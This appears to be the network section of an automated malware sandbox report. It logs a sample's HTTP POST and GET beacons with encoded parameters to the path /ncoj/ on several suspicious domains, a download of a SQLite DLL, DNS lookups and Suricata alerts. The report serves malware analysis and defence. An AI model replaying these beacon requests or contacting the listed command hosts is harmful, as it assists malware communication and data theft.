Network Analysis
- TCP Requests
-
-
192.168.56.101:49170 104.21.66.93:80www.bord90-1us.click
-
192.168.56.101:49171 104.21.66.93:80www.bord90-1us.click
-
192.168.56.101:49177 142.250.66.51:80www.bimiraq.com
-
192.168.56.101:49178 142.250.66.51:80www.bimiraq.com
-
192.168.56.101:49181 154.221.16.17:80www.38mwynj7dug2.buzz
-
192.168.56.101:49182 154.221.16.17:80www.38mwynj7dug2.buzz
-
192.168.56.101:49179 172.67.142.142:80www.antsnav.com
-
192.168.56.101:49180 172.67.142.142:80www.antsnav.com
-
192.168.56.101:49183 38.181.59.39:80www.lppkk.com
-
192.168.56.101:49184 38.181.59.39:80www.lppkk.com
-
192.168.56.101:49172 45.33.6.223:80www.sqlite.org
-
- UDP Requests
-
-
192.168.56.101:53004 164.124.101.2:53
-
192.168.56.101:53850 164.124.101.2:53
-
192.168.56.101:54148 164.124.101.2:53
-
192.168.56.101:54883 164.124.101.2:53
-
192.168.56.101:55146 164.124.101.2:53
-
192.168.56.101:59002 164.124.101.2:53
-
192.168.56.101:61950 164.124.101.2:53
-
192.168.56.101:137 192.168.56.255:137
-
192.168.56.101:59005 239.255.255.250:1900
-
192.168.56.103:137 192.168.56.101:137
-
POST
404
http://www.bord90-1us.click/ncoj/
REQUEST
RESPONSE
BODY
POST /ncoj/ HTTP/1.1
Host: www.bord90-1us.click
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Content-Length: 175
Content-Type: application/x-www-form-urlencoded
Connection: close
Cache-Control: max-age=0
Origin: http://www.bord90-1us.click
Referer: http://www.bord90-1us.click/ncoj/
User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
HTTP/1.1 404 Not Found
Date: Tue, 03 Oct 2023 22:48:07 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
cache-control: private, no-cache, no-store, must-revalidate, max-age=0
pragma: no-cache
x-turbo-charged-by: LiteSpeed
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=gZP8IG9ejEpSV1qzDHqxhJPPKRTj%2Bji8HMBtvDUcvbRnBSHUkD8QKt%2FtXHDkChqSSzWAXAlJSvor7yxhjdo7HpfmkPiuTJFWjRF0FtbLqaxmSZabAdUBmmYspqn4pFQXg6%2FRBwnRgw%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8108bb153fdcfbd4-KIX
Content-Encoding: gzip
alt-svc: h3=":443"; ma=86400
GET
404
http://www.bord90-1us.click/ncoj/?nxDCyr=/wpW4Eg1zfji5WRIM69mwwfkBKVWxDHOUMH3dJ+6otM1KiL+BV8qZwOPMcyaXeTE36ZRIVdGgp9cEXlGc10Qp3ASMmejNlAX5LVEWFU=&6h=f51UoXbt17G
REQUEST
RESPONSE
BODY
GET /ncoj/?nxDCyr=/wpW4Eg1zfji5WRIM69mwwfkBKVWxDHOUMH3dJ+6otM1KiL+BV8qZwOPMcyaXeTE36ZRIVdGgp9cEXlGc10Qp3ASMmejNlAX5LVEWFU=&6h=f51UoXbt17G HTTP/1.1
Host: www.bord90-1us.click
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
Connection: close
User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
HTTP/1.1 404 Not Found
Date: Tue, 03 Oct 2023 22:48:10 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
cache-control: private, no-cache, no-store, must-revalidate, max-age=0
pragma: no-cache
x-turbo-charged-by: LiteSpeed
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=03bPWTf0Eoad1jKrEwXv1P18b1%2FDKH4mZiaXN6IxpP4PNnBNMS%2BF187TjliapSUAclgRNc5flu18Q80eTPifk3tSxrSOBIZjjAMjg4sgW%2BjmzKuUNgVTI3fjGfpwbTsef3ludher5Q%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8108bb250dc90aa6-KIX
alt-svc: h3=":443"; ma=86400
GET
200
http://www.sqlite.org/2021/sqlite-dll-win32-x86-3350000.zip
REQUEST
RESPONSE
BODY
GET /2021/sqlite-dll-win32-x86-3350000.zip HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.2; .NET4.0C; .NET4.0E)
Host: www.sqlite.org
Connection: Keep-Alive
HTTP/1.1 200 OK
Connection: keep-alive
Date: Tue, 03 Oct 2023 22:48:12 GMT
Last-Modified: Mon, 15 Mar 2021 12:22:51 GMT
Cache-Control: max-age=120
ETag: "m604f519bs7c92b"
Content-type: application/zip; charset=utf-8
Content-length: 510251
POST
301
http://www.bimiraq.com/ncoj/
REQUEST
RESPONSE
BODY
POST /ncoj/ HTTP/1.1
Host: www.bimiraq.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Content-Length: 187
Content-Type: application/x-www-form-urlencoded
Connection: close
Cache-Control: max-age=0
Origin: http://www.bimiraq.com
Referer: http://www.bimiraq.com/ncoj/
User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
HTTP/1.1 301 Moved Permanently
Content-Type: application/binary
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Date: Tue, 03 Oct 2023 22:48:31 GMT
Location: https://www.bimiraq.com/ncoj/
Server: ESF
Content-Length: 0
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
Connection: close
GET
301
http://www.bimiraq.com/ncoj/?nxDCyr=XIxLCAEQ0j01YzKaapTqF+nS+qsHR4K+mT3TcIh0YevVauHQuuRL63AlAq6+mNvg+WbM+1ZCwlrFZaygUBCQMrF8dtNZCh2ZDkiTiSo=&6h=f51UoXbt17G
REQUEST
RESPONSE
BODY
GET /ncoj/?nxDCyr=XIxLCAEQ0j01YzKaapTqF+nS+qsHR4K+mT3TcIh0YevVauHQuuRL63AlAq6+mNvg+WbM+1ZCwlrFZaygUBCQMrF8dtNZCh2ZDkiTiSo=&6h=f51UoXbt17G HTTP/1.1
Host: www.bimiraq.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
Connection: close
User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
HTTP/1.1 301 Moved Permanently
Content-Type: application/binary
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Date: Tue, 03 Oct 2023 22:48:33 GMT
Location: https://www.bimiraq.com/ncoj/?nxDCyr=XIxLCAEQ0j01YzKaapTqF+nS+qsHR4K+mT3TcIh0YevVauHQuuRL63AlAq6+mNvg+WbM+1ZCwlrFZaygUBCQMrF8dtNZCh2ZDkiTiSo%3D&6h=f51UoXbt17G
Server: ESF
Content-Length: 0
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
Connection: close
POST
404
http://www.antsnav.com/ncoj/
REQUEST
RESPONSE
BODY
POST /ncoj/ HTTP/1.1
Host: www.antsnav.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Content-Length: 187
Content-Type: application/x-www-form-urlencoded
Connection: close
Cache-Control: max-age=0
Origin: http://www.antsnav.com
Referer: http://www.antsnav.com/ncoj/
User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
HTTP/1.1 404 Not Found
Date: Tue, 03 Oct 2023 22:48:39 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=SejlgSOJAI3%2B%2BZNPG3LzxWwCZZDbyuLMO%2BjyhD2z%2B2sPIElWPHUdDwVEIBdqWxnSa2waiZXmW712%2BmSW5vBttNRD3Av2E4qvYPOQGoOGiPE9efLpY4TBoMfWfDdAhoB81Kg%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8108bbdc98081a25-KIX
Content-Encoding: gzip
alt-svc: h3=":443"; ma=86400
GET
404
http://www.antsnav.com/ncoj/?nxDCyr=k6lZgIYtgKScwrY8pHro/PDAsyN+Ma0X/rCAAme2ni/5IVGLYG0zVGplEfRL+3QOVGKsiLjVRU/vs+oeg30ChqgsNcJjfndCx8nhIPk=&6h=f51UoXbt17G
REQUEST
RESPONSE
BODY
GET /ncoj/?nxDCyr=k6lZgIYtgKScwrY8pHro/PDAsyN+Ma0X/rCAAme2ni/5IVGLYG0zVGplEfRL+3QOVGKsiLjVRU/vs+oeg30ChqgsNcJjfndCx8nhIPk=&6h=f51UoXbt17G HTTP/1.1
Host: www.antsnav.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
Connection: close
User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
HTTP/1.1 404 Not Found
Date: Tue, 03 Oct 2023 22:48:41 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=dU3S1HLqLeOzh%2Bm1mR9ljzcEYuPEMPwX23%2Fb%2BfOwmx%2FTrdC9j3VTMFJHU2x7IDN5B9QH5NM8mUobpzOqQHiGYLmqJ5tLbsSFPUtib%2FQVk%2Bh%2FxJcphl8LXW06c26V0yE5g4M%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8108bbec595319fd-KIX
alt-svc: h3=":443"; ma=86400
POST
404
http://www.38mwynj7dug2.buzz/ncoj/
REQUEST
RESPONSE
BODY
POST /ncoj/ HTTP/1.1
Host: www.38mwynj7dug2.buzz
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Content-Length: 187
Content-Type: application/x-www-form-urlencoded
Connection: close
Cache-Control: max-age=0
Origin: http://www.38mwynj7dug2.buzz
Referer: http://www.38mwynj7dug2.buzz/ncoj/
User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
HTTP/1.1 404 Not Found
Server: nginx
Date: Tue, 03 Oct 2023 22:40:26 GMT
Content-Type: text/html
Content-Length: 146
Connection: close
GET
404
http://www.38mwynj7dug2.buzz/ncoj/?nxDCyr=cqsb9busYckswu5tl2hs1PEI9pWErdimDzlp34E2aha2iJT2eFFG/funIEYSTKoaqITRs/NPOvbiiBSI+XWo0HJ5fu7hwmxGTgtg6FY=&6h=f51UoXbt17G
REQUEST
RESPONSE
BODY
GET /ncoj/?nxDCyr=cqsb9busYckswu5tl2hs1PEI9pWErdimDzlp34E2aha2iJT2eFFG/funIEYSTKoaqITRs/NPOvbiiBSI+XWo0HJ5fu7hwmxGTgtg6FY=&6h=f51UoXbt17G HTTP/1.1
Host: www.38mwynj7dug2.buzz
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
Connection: close
User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
HTTP/1.1 404 Not Found
Server: nginx
Date: Tue, 03 Oct 2023 22:40:29 GMT
Content-Type: text/html
Content-Length: 146
Connection: close
POST
404
http://www.lppkk.com/ncoj/
REQUEST
RESPONSE
BODY
POST /ncoj/ HTTP/1.1
Host: www.lppkk.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Content-Length: 187
Content-Type: application/x-www-form-urlencoded
Connection: close
Cache-Control: max-age=0
Origin: http://www.lppkk.com
Referer: http://www.lppkk.com/ncoj/
User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
HTTP/1.1 404 Not Found
Content-Type: text/html
Server: Microsoft-IIS/10.0
X-Powered-By: ASP.NET
Date: Tue, 03 Oct 2023 22:48:55 GMT
Connection: close
Content-Length: 1163
GET
404
http://www.lppkk.com/ncoj/?nxDCyr=Mtp3WxtNvxk26bamdUjkb0yMxjBBBeG3EFYaeCPTWM8qB4rDVAANJEhbdFBrwp5JzidZg3tzQPFU7dQqmqHJyHV4uamwOaSCvkmmqms=&6h=f51UoXbt17G
REQUEST
RESPONSE
BODY
GET /ncoj/?nxDCyr=Mtp3WxtNvxk26bamdUjkb0yMxjBBBeG3EFYaeCPTWM8qB4rDVAANJEhbdFBrwp5JzidZg3tzQPFU7dQqmqHJyHV4uamwOaSCvkmmqms=&6h=f51UoXbt17G HTTP/1.1
Host: www.lppkk.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
Connection: close
User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
HTTP/1.1 404 Not Found
Content-Type: text/html
Server: Microsoft-IIS/10.0
X-Powered-By: ASP.NET
Date: Tue, 03 Oct 2023 22:48:57 GMT
Connection: close
Content-Length: 1163
ICMP traffic
No ICMP traffic performed.
IRC traffic
No IRC requests performed.
Suricata Alerts
| Flow | SID | Signature | Category |
|---|---|---|---|
| TCP 192.168.56.101:49182 -> 154.221.16.17:80 | 2032991 | ET INFO HTTP Request to a *.buzz domain | Potentially Bad Traffic |
| TCP 192.168.56.101:49181 -> 154.221.16.17:80 | 2032991 | ET INFO HTTP Request to a *.buzz domain | Potentially Bad Traffic |
Suricata TLS
No Suricata TLS
Snort Alerts
No Snort Alerts